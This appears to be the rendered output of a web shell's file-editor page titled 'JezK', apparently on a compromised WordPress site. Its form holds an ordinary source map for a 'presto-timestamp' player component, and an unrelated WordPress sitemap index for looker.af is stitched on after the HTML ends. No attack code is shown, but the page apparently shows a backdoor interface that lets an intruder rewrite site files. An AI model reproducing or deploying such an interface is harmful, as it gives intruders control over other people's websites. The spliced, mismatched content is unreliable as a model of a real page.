
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: presto-timestamp.js.map</h2><form method="post"><textarea name="file_content" rows="10" cols="50">{&quot;file&quot;:&quot;presto-timestamp.js&quot;,&quot;mappings&quot;:&quot;;;AAAA,MAAM,kBAAkB,GAAG,uBAAuB,CAAC;AACnD,8BAAe,kBAAkB;;MCMpBA,iBAAe;;;;;;IAG1B,WAAW,CAAC,CAAC;QACX,CAAC,CAAC,cAAc,EAAE,CAAC;QACnB,MAAM,MAAM,GAAG,QAAQ,CAAC,IAAI,CAAC,aAAa,CAAC,eAAe,CAAC,CAAC;QAC5D,IAAI,CAAC,MAAM;YAAE,OAAO;QACpB,MAAM,CAAC,WAAW,CAAC,IAAI,CAAC,aAAa,CAAC,IAAI,CAAC,IAAI,CAAC,CAAC,CAAC;KACnD;;;;;IAMD,aAAa,CAAC,IAAI;QAChB,IAAI,MAAM,GAAG,IAAI,CAAC,KAAK,CAAC,GAAG,CAAC,CAAC;QAC7B,IAAI,OAAO,CAAC;QACZ,IAAI,MAAM,CAAC,MAAM,GAAG,CAAC,EAAE;YACrB,OAAO,GAAG,QAAQ,CAAC,MAAM,CAAC,CAAC,CAAC,CAAC,GAAG,EAAE,CAAC;SACpC;QACD,OAAO,QAAQ,CAAC,MAAM,CAAC,CAAC,CAAC,CAAC,GAAG,QAAQ,CAAC,OAAO,CAAC,CAAC;KAChD;IAED,MAAM;QACJ,QACE,0DAAG,IAAI,EAAC,GAAG,EAAC,KAAK,EAAC,kBAAkB,EAAC,OAAO,EAAE,CAAC,IAAI,IAAI,CAAC,WAAW,CAAC,CAAC,CAAC,IACpE,+DAAO,IAAI,CAAC,IAAI,CAAQ,CACtB,EACJ;KACH;;;;;;;;;;;;;;;;;;;;;;;;&quot;,&quot;names&quot;:[&quot;PrestoTimestamp&quot;],&quot;sources&quot;:[&quot;src/components/core/features/presto-timestamp/presto-timestamp.scss?tag=presto-timestamp&quot;,&quot;src/components/core/features/presto-timestamp/presto-timestamp.tsx&quot;],&quot;sourcesContent&quot;:[&quot;:host {\n  display: inline;\n}\n&quot;,&quot;import { Component, h, Prop } from &#039;@stencil/core&#039;;\n\n@Component({\n  tag: &#039;presto-timestamp&#039;,\n  styleUrl: &#039;presto-timestamp.scss&#039;,\n  shadow: false,\n})\nexport class PrestoTimestamp {\n  @Prop() time: string;\n\n  handleClick(e) {\n    e.preventDefault();\n    const player = document.body.querySelector(&#039;presto-player&#039;);\n    if (!player) return;\n    player.goToAndPlay(this.timeToSeconds(this.time));\n  }\n\n  /**\n   * Formats Timestamp to seconds.\n   * I.E. 12:34 to number of seconds.\n   */\n  timeToSeconds(time) {\n    let pieces = time.split(&#039;:&#039;);\n    let seconds;\n    if (pieces.length &gt; 1) {\n      seconds = parseInt(pieces[0]) * 60;\n    }\n    return parseInt(pieces[1]) + parseInt(seconds);\n  }\n\n  render() {\n    return (\n      &lt;a href=\&quot;#\&quot; class=\&quot;presto-timestamp\&quot; onClick={e =&gt; this.handleClick(e)}&gt;\n        &lt;slot&gt;{this.time}&lt;/slot&gt;\n      &lt;/a&gt;\n    );\n  }\n}\n&quot;],&quot;version&quot;:3}</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
